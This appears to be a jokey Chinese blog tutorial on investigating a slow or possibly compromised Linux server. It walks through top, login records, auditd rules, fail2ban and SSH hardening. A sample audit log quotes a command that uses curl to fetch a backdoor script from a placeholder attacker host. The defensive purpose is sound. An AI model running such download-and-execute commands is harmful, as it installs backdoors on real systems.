当服务器突然变卡，就像合租室友偷吃你的外卖…

“卧槽，我的服务器怎么跑得跟老牛拉破车一样？”某天深夜，我盯着监控里飙红的CPU曲线陷入沉思——这感觉就像回家发现冰箱里的可乐少了一半，但合租群里没人认账！今天就用IT侦探的视角，手把手教你用Linux版“查监控+翻日志+验指纹”三连招，把占用服务器的“神秘人”扒得底裤都不剩！（文末附赠骚操作彩蛋）

第一招：`top`命令——实时抓捕“CPU大胃王”

（适合抓现行犯，效果堪比监控摄像头）

操作示例：

```bash

top -c -u

-c显示完整命令，-u按用户筛选

```

你会看到这样的“通缉令榜单”：

PID USER %CPU %MEM COMMAND

666 root 99% 2% /usr/bin/xxxminer --挖矿参数...

777 mysql 30% 50% /usr/sbin/mysqld

专业解读：

- CPU%>90%的进程：大概率是恶意挖矿程序（比如臭名昭著的`xmrig`）

- 异常用户：突然冒出的`www-data`或`nobody`用户跑高耗能任务？绝对有鬼！

- 内存泄漏：像MySQL这种内存大户长期不释放，可能是配置不当（别慌，文末教调优）

幽默Tips：

如果发现某个进程占CPU比前任还黏人，直接按`k`输入PID送它上西天——但记得先截图留证！（不然老板问起来只能表演失忆）

第二招：`last/lastb`——翻查服务器“开房记录”

（登录记录比酒店前台登记表还详细）

破案关键命令：

last -ai | grep -v "reboot"

显示所有登录IP和时间，排除重启记录

lastb -a

查看失败登录记录（黑客常用爆破工具会留痕）

典型犯罪现场还原：

root pts/1 192.168.1.666 Mon May 20 03:14 still logged in

unknown ssh:notty 45.67.89.000 May 19 22:05 - 22:07 (00:02)

专业分析：

- 陌生IP+非正常时段登录：比如凌晨3点来自毛里求斯的SSH连接…你司难道有跨国分部？

- `ssh:notty`提示无终端登录：大概率是自动化攻击工具在试探密码

骚操作防御：

用fail2ban自动封禁暴力破解IP：

sudo apt install fail2ban

sudo systemctl enable fail2ban

从此让黑客体验“开门红”（404警告）

第三招：`auditd`日志审计——给服务器装“行车记录仪”

（高阶玩法，连sudo提权操作都能录下来）

实战配置步骤：

1. 安装审计工具包：

```bash

sudo apt install auditd -y

sudo systemctl start auditd

```

2. 监控敏感操作（示例监控/etc目录变更）：

sudo auditctl -w /etc -p wa -k etc_changes

-w监视目录，-k打标签

3. 查询审计日志：

ausearch -k etc_changes | aureport -f -i

生成人类可读报告

经典入侵证据链：

time->Mon May 20 03:15:01 2023

type=PROCTITLE msg=audit(123456): proctitle="/bin/bash -c curl http://黑IP/backdoor.sh"

type=SYSCALL msg=audit(123456): arch=x86_64 syscall=execve success=yes exit=0...

翻译成人话：“凌晨3点15分有人用bash下载了后门脚本还执行成功了！”（此时应立刻拔网线）

终极防御套餐（附赠脚本小子克星技巧）

1. SSH防暴破组合拳:

1.改端口 + 禁用root登录 + 密钥认证

sudo sed -i 's/

Port 22/Port 54321/' /etc/ssh/sshd_config

echo "PermitRootLogin no" | sudo tee -a /etc/ssh/sshd_config

2.用iptables限制SSH访问IP白名单（适合企业）

sudo iptables -A INPUT -p tcp --dport 54321 -s 你办公IP -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 54321 -j DROP

2. 定期巡检脚本范例:

!/bin/bash

echo "=====可疑进程TOP10====="

ps aux --sort=-%cpu | head -n 10

echo "=====最近10次登录====="

last | head

echo "====/tmp目录异常文件===="

find /tmp -type f -mtime -1 ! -name "*.sock"

配合crontab每周自动运行一次，报告发邮箱美滋滋~

```

：运维的尽头是福尔摩斯？

某次我用这套方法帮客户逮到一个用公司服务器挖门罗币的前员工…结果老板怒省5万美金云计算账单！所以啊——服务器排查不是玄学，而是科学+柯南精神的结合。下次遇到异常卡顿时，请优雅地推一推并不存在的眼镜：“真相只有一个！” （完）

TAG:怎么查服务器被谁占用过,怎么查看服务器有哪些用户,怎么查服务器被谁占用过了,怎么查服务器端口被占用,如何查看服务器是否被入侵,怎么查看服务器是否在使用